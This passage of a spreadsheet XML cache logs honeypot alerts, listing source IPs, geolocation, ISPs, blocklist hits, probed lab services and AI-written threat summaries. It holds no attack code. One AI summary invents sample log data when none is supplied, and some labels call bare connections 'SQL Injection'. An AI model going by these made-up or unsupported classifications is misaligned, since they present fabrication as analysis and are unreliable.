    <s v="{Data_SMB:Incoming connection (180.151.90.31,38591)}&amp;&amp;{Data_SMB:Incoming connection (180.151.90.31,38594)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (180.151.90.31,38961)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (180.151.90.31,48238)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b497:5a1f"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="A suspicious incoming connection to a shared resource has been detected from an unknown IP address 180.151.90.31. The connection is likely attempting unauthorized access or exploitation of the system's shared resources. This could be a sign of potential malware propagation or unauthorized data exfiltration. &amp;&amp; An incoming connection from an unknown IP address suggests potential unauthorized access to SMB services._x000a_This could be a sign of malware scanning or reconnaissance by malicious actors._x000a_Further investigation is required to determine the true intentions behind this connection."/>
    <m/>
  </r>
  <r>
    <x v="745"/>
    <x v="745"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-26T14:49:49"/>
    <d v="2024-10-28T09:30:38"/>
    <d v="2025-04-26T14:49:49"/>
    <n v="58"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H29&amp;&amp;SMA-LAB_MSSQL_H23&amp;&amp;SMA-LAB_SMB_H23&amp;&amp;SMA-LAB_MSSQL_H44&amp;&amp;SMA-LAB_SMB_H29&amp;&amp;SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_SMB_H45&amp;&amp;SMA-LAB_MYSQL_H45&amp;&amp;SMA-LAB_MSSQL_H45&amp;&amp;SMA-LAB_MSSQL_H13"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;445&amp;&amp;3306"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['spam']}"/>
    <n v="30"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="TN"/>
    <s v="Tamil Nadu"/>
    <s v="Chennai"/>
    <s v="Chennai"/>
    <s v="1264527"/>
    <s v="600001"/>
    <s v="13.0827"/>
    <s v="80.2707"/>
    <s v="136336"/>
    <s v="Thamizhaga Internet Communications Private Limited"/>
    <s v="Thamizhaga Internet Communications Private Limited"/>
    <s v="residential"/>
    <s v="Tdnetwork"/>
    <s v="2022-08-04"/>
    <s v="TDNETWORK"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.98.208.180,63095)}&amp;&amp;{Data_SMB:Incoming connection (103.98.208.180,63392)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.98.208.180,57220)}&amp;&amp;{Data_SMB:Incoming connection (103.98.208.180,60986)}&amp;&amp;{Data_SMB:Incoming connection (103.98.208.180,62238)}&amp;&amp;{Data_SMB:Incoming connection (103.98.208.180,63299)}&amp;&amp;{Data_SMB:Incoming connection (103.98.208.180,63730)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.98.208.180,54788)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6762:d0b4"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="746"/>
    <x v="746"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-26T14:27:33"/>
    <d v="2024-12-27T16:24:17"/>
    <d v="2025-04-26T14:27:33"/>
    <n v="19"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H43"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="WB"/>
    <s v="West Bengal"/>
    <s v="Kolkata"/>
    <s v="Kolkata (Entally)"/>
    <s v="1275004"/>
    <s v="700052"/>
    <s v="22.5528"/>
    <s v="88.3718"/>
    <s v="23860"/>
    <s v="Alliance Broadband Services Pvt. Ltd."/>
    <s v="Alliance Broadband Services"/>
    <s v="residential"/>
    <s v="Alliance Broadband Services Pvt. Ltd."/>
    <s v="2007-07-13"/>
    <s v="ALLIANCEBROADBAND-IN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:74c1:8958"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="Possible attempt to exploit Microsoft SQL Server vulnerability, but no malicious activity was detected as Data_MSSQL is marked as Not Available (NA). This could be an initial scan or probing for vulnerabilities rather than a full-blown attack. The lack of data availability suggests the attempt may have been unsuccessful or not thorough."/>
    <m/>
  </r>
  <r>
    <x v="747"/>
    <x v="747"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-26T14:26:57"/>
    <d v="2025-04-26T14:26:27"/>
    <d v="2025-04-26T14:26:57"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Brute Force"/>
    <s v="high"/>
    <s v="SMA-LAB_corporatelogin_Login.NIPPONINDIAIM_HC1"/>
    <s v="443"/>
    <s v="True"/>
    <s v="{'cbl.abuseat.org': ['unknown']}"/>
    <n v="32"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="AE"/>
    <s v="United Arab Emirates"/>
    <s v="AZ"/>
    <s v="Abu Dhabi"/>
    <s v="Al Ain"/>
    <s v="Al Ain"/>
    <s v="292913"/>
    <s v="NA"/>
    <s v="24.1917"/>
    <s v="55.7606"/>
    <s v="62044"/>
    <s v="Zscaler Switzerland GmbH"/>
    <s v="Zscaler Switzerland GmbH"/>
    <s v="business"/>
    <s v="Zscaler Dxb1"/>
    <s v="2005-05-20"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login"/>
    <s v="{HTTP_LOGIN:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:573a:434e"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="High"/>
    <s v="An unknown user attempted to access an account using a suspicious browser string. The user is likely trying to brute-force login credentials. This attempt may be part of a larger credential stuffing attack. &amp;&amp; Possible brute force login attempt by a user with the browser type and version listed, attempting to access a web application on Windows 10 system. The user is likely trying multiple combinations of credentials to gain unauthorized access. This activity could be a precursor to a more sophisticated attack if successful."/>
    <m/>
  </r>
  <r>
    <x v="748"/>
    <x v="748"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-26T14:13:25"/>
    <d v="2025-04-26T14:13:25"/>
    <d v="2025-04-26T14:13:25"/>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rporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b5b:afcf"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="The log data indicates that there was an attempt to establish a connection using TELNET, which could be a reconnaissance or scanning activity to identify open ports and services._x000a_However, the actual activity might have been prevented as Data_TELNET is marked as NA._x000a_This suggests that the attempted malicious action may have been thwarted by security measures. &amp;&amp; No activity detected for TELNET service, possibly an attempt to scan or connect to the system. No login attempts made, which could indicate a scanning or reconnaissance effort rather than a targeted attack. Service not accessed, possibly due to being closed or filtered out by security measures."/>
    <m/>
  </r>
  <r>
    <x v="749"/>
    <x v="749"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-26T14:11:42"/>
    <d v="2025-02-07T12:23:47"/>
    <d v="2025-04-26T14:11:42"/>
    <n v="29"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;abuseipdb"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="BR"/>
    <s v="Brazil"/>
    <s v="SP"/>
    <s v="São Paulo"/>
    <s v="São Carlos"/>
    <s v="São Carlos"/>
    <s v="3449319"/>
    <s v="NA"/>
    <s v="-22.0175"/>
    <s v="-47.8908"/>
    <s v="263672"/>
    <s v="Consult Telecom Provedor LTDA ME"/>
    <s v="Consult Telecom Provedor LTDA ME"/>
    <s v="business"/>
    <s v="Consult Telecom Provedor LTDA ME"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b1dd:3c99"/>
    <s v="C-I_D"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <s v="There is insufficient log data to analyze possible malicious activity. The provided log appears to be empty or missing relevant information. As a result, no analysis can be conducted at this time. &amp;&amp; No log data provided, cannot analyze any malicious activity."/>
    <s v="I'd love to help, but it seems there's no log data provided! Could you please share the actual log data so I can analyze and categorize the types of attacks? &amp;&amp; I'd be happy to help you analyze some log data! However, since you haven't provided any actual log data, I'll create some sample data for demonstration purposes._x000a__x000a_Let's say we have the following log data:_x000a__x000a_```_x000a_[2023-02-20 14:30:00] IP Address: 192.168.1.100, Service: SSH, Method: Bruteforce_x000a_[2023-02-20 15:45:00] IP Address: 8.8.8.8, Service: FTP, Method: Password Cracking_x000a_[2023-02-20 16:10:00] IP Address: 192.168.1.200, Service: SMTP, Method: Phishing Attack_x000a_```_x000a__x000a_Based on this sample data, the type of attack for each log entry is:_x000a__x000a_1. Bruteforce SSH_x000a_2. Password Cracking FTP_x000a_3. Phishing SMTP"/>
  </r>
  <r>
    <x v="750"/>
    <x v="750"/>
    <s v="NA&amp;&amp;zaqb4ddc156.rev.zaq.ne.jp"/>
    <x v="0"/>
    <d v="2025-04-26T14:11:00"/>
    <d v="2025-03-06T16:46:05"/>
    <d v="2025-04-26T14:11:00"/>
    <n v="20"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H11"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="JP"/>
    <s v="Japan"/>
    <s v="13"/>
    <s v="Tokyo"/>
    <s v="Chiyoda"/>
    <s v="Chiyoda"/>
    <s v="11749713"/>
    <s v="100-8111"/>
    <s v="35.6906"/>
    <s v="139.77"/>
    <s v="9617"/>
    <s v="JCOM Co., Ltd."/>
    <s v="JCOM Co., Ltd."/>
    <s v="business"/>
    <s v="Jupiter Telecommunications Co., Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b4dd:c156"/>
    <s v="C-I_D"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="751"/>
    <x v="751"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-26T14:04:03"/>
    <d v="2024-07-08T16:49:00"/>
    <d v="2025-04-26T14:04:03"/>
    <n v="11"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H11&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MT-CPA_H12&amp;&amp;SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;28420&amp;&amp;3306&amp;&amp;46985&amp;&amp;1433&amp;&amp;445"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="HN"/>
    <s v="Hanoi"/>
    <s v="Hoan Kiem"/>
    <s v="Hanoi"/>
    <s v="1581130"/>
    <s v="NA"/>
    <s v="21.0278"/>
    <s v="105.834"/>
    <s v="7552"/>
    <s v="Viettel Group"/>
    <s v="Viettel Corporation"/>
    <s v="residential"/>
    <s v="VIETEL"/>
    <s v="2011-03-04"/>
    <s v="VIETTEL-VN"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (171.232.199.14,65078)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:abe8:c70e"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="The log indicates an attempt to connect to a MySQL database, suggesting unauthorized access or brute-force attack. The absence of credentials suggests a probing activity. This may be a precursor to malicious actions such as data theft or modification."/>
    <s v="SQL Injection"/>
  </r>
  <r>
    <x v="752"/>
    <x v="752"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-26T13:45:28"/>
    <d v="2025-01-21T14:21:40"/>
    <d v="2025-04-26T13:45:28"/>
    <n v="24"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MT-CPA_H2"/>
    <s v="1433&amp;&amp;52078&amp;&amp;445"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'cbl.abuseat.org': ['unknown']&amp;&amp; 'dnsbl-3.uceprotect.net': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown'&amp;&amp; 'exploits'&amp;&amp; 'spam']}"/>
    <n v="168"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="BN"/>
    <s v="Brunei"/>
    <s v="TE"/>
    <s v="Temburong"/>
    <s v="NA"/>
    <s v="Bangar"/>
    <s v="1820903"/>
    <s v="NA"/>
    <s v="4.70861"/>
    <s v="115.072"/>
    <s v="10094"/>
    <s v="Unified National Networks"/>
    <s v="espeed - Broadband DSL"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2008-02-20"/>
    <s v="eSpeed-BN"/>
    <s v="None"/>
    <s v="login&amp;&amp;NA&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (119.160.189.202,62095)}&amp;&amp;{Data_SMB:Incoming connection (119.160.189.202,43193)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (119.160.189.202,44752)}&amp;&amp;{Data_SMB:Incoming connection (119.160.189.202,37316)}&amp;&amp;{Data_SMB:Incoming connection (119.160.189.202,60114)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:77a0:bdca"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="753"/>
    <x v="753"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-26T13:38:40"/>
    <d v="2025-04-26T13:38:40"/>
    <d v="2025-04-26T13:38:40"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>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dd:7622"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="754"/>
    <x v="754"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-26T13:28:59"/>
    <d v="2025-04-26T13:28:59"/>
    <d v="2025-04-26T13:28:59"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'b.barracudacentral.org': ['unknown']}"/>
    <n v="68"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="HN"/>
    <s v="Hanoi"/>
    <s v="Cầu Giấy District"/>
    <s v="Cầu Giấy"/>
    <s v="8616113"/>
    <s v="NA"/>
    <s v="21.0323"/>
    <s v="105.801"/>
    <s v="18403"/>
    <s v="FPT-AS-AP"/>
    <s v="FPT Telecom Company"/>
    <s v="consumer"/>
    <s v="Vietnam Internet Network Information Center"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:137:ff7c"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No data received from MSSQL service indicating potential scan or probe activity. _x000a_Unknown client attempted to connect to MSSQL service without sending any valid request. _x000a_Could be an initial step of reconnaissance before attempting actual exploitation. &amp;&amp; This suggests an attempt to access a Microsoft SQL database, likely with malicious intent such as unauthorized access or data theft, possibly through brute force attacks. _x000a_The attacker is trying to exploit the system's vulnerability for potential data extraction. _x000a_Malicious actor is targeting database credentials or permissions."/>
    <m/>
  </r>
  <r>
    <x v="755"/>
    <x v="755"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-26T13:23:39"/>
    <d v="2024-12-04T14:45:29"/>
    <d v="2025-04-26T13:23:39"/>
    <n v="29"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H43"/>
    <s v="1433&amp;&amp;445"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Pocket F)"/>
    <s v="1261481"/>
    <s v="110049"/>
    <s v="28.5192"/>
    <s v="77.2791"/>
    <s v="18002"/>
    <s v="World Phone Internet Services Pvt. Ltd."/>
    <s v="World Phone Internet Services Pvt. Ltd."/>
    <s v="business"/>
    <s v="World Phone  Pvt Ltd"/>
    <s v="2009-04-29"/>
    <s v="WORLDPHONE-IN"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (110.172.132.235,52726)}&amp;&amp;{Data_SMB:Incoming connection (110.172.132.235,53424)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (110.172.132.235,56024)}&amp;&amp;{Data_SMB:Incoming connection (110.172.132.235,56353)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (110.172.132.235,53298)}&amp;&amp;{Data_SMB:Incoming connection (110.172.132.235,53814)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6eac:84eb"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="A potential malicious activity has been detected where an incoming connection is being made from an external IP address. This could be an attempt to exploit the SMB service for unauthorized access or to spread malware. An unknown entity may be trying to breach the system's security. &amp;&amp; An incoming connection attempt has been detected from an unknown IP address, potentially indicating a port scanning or brute force attack on the SMB service. The source IP and port may be malicious. Further investigation is required to verify the nature of this activity. &amp;&amp; A malicious actor has attempted to connect to an SMB service from an unknown IP address. This could be a scan for vulnerabilities or an attempt to exploit the system. Further investigation is needed to determine the intentions of this action. &amp;&amp; An incoming connection from an unknown IP address is attempting to access the SMB service. This could be indicative of a potential malicious activity such as a brute force attack or a ransomware attempt. The suspicious nature of this action warrants further investigation."/>
    <s v="SMB Scanning &amp;&amp; Port Scanning"/>
  </r>
  <r>
    <x v="756"/>
    <x v="756"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-26T13:21:08"/>
    <d v="2025-04-26T06:14:59"/>
    <d v="2025-04-26T13:21:08"/>
    <n v="4"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_SOCKS5_H3&amp;&amp;SMA-LAB_POSTGRES_HC1"/>
    <s v="1080&amp;&amp;5432"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="HN"/>
    <s v="Hanoi"/>
    <s v="Hoan Kiem"/>
    <s v="Hanoi"/>
    <s v="1581130"/>
    <s v="NA"/>
    <s v="21.0278"/>
    <s v="105.834"/>
    <s v="7552"/>
    <s v="Viettel Group"/>
    <s v="Viettel Corporation"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2007-05-21"/>
    <s v="VIETTEL-VN"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_SOCKS5:NA}&amp;&amp;{Data_POSTGRES:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7502:bb58"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="Unknown traffic detected for SOCKS5 service, indicating potential malicious proxying or tunneling activity. This could be related to attempting to bypass security measures or hide identity. Further investigation is needed to determine the nature of this activity. &amp;&amp; No suspicious activity detected for SOCKS5 connections. _x000a_The data is indicating that no attempts were made to use SOCKS5 for malicious purposes, such as tunneling or proxying. &amp;&amp; An attempt was made to access PostgreSQL database service, indicating potential malicious SQL injection or unauthorized database access._x000a_The intruder may be trying to exploit vulnerabilities in the database to gain sensitive information._x000a_This activity could be a sign of a larger attack on the network. &amp;&amp; This suggests an attempt to connect to a PostgreSQL database without any actual login credentials, likely a brute-force or probing activity._x000a_A potential indicator of malicious reconnaissance or exploitation attempts against the database service. _x000a_It could be a precursor to a full-blown database attack."/>
    <s v="SQL Injection &amp;&amp; SQL Attack"/>
  </r>
  <r>
    <x v="757"/>
    <x v="757"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-26T13:20:16"/>
    <d v="2025-04-26T13:20:16"/>
    <d v="2025-04-26T13:20:16"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="WB"/>
    <s v="West Bengal"/>
    <s v="Howrah"/>
    <s v="Bāli"/>
    <s v="1277539"/>
    <s v="NA"/>
    <s v="22.6486"/>
    <s v="88.3411"/>
    <s v="17488"/>
    <s v="HATHWAY-NET-AP"/>
    <s v="Hathway IP over Cable Internet Access"/>
    <s v="consumer"/>
    <s v="Hathway Cable and Datacom Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
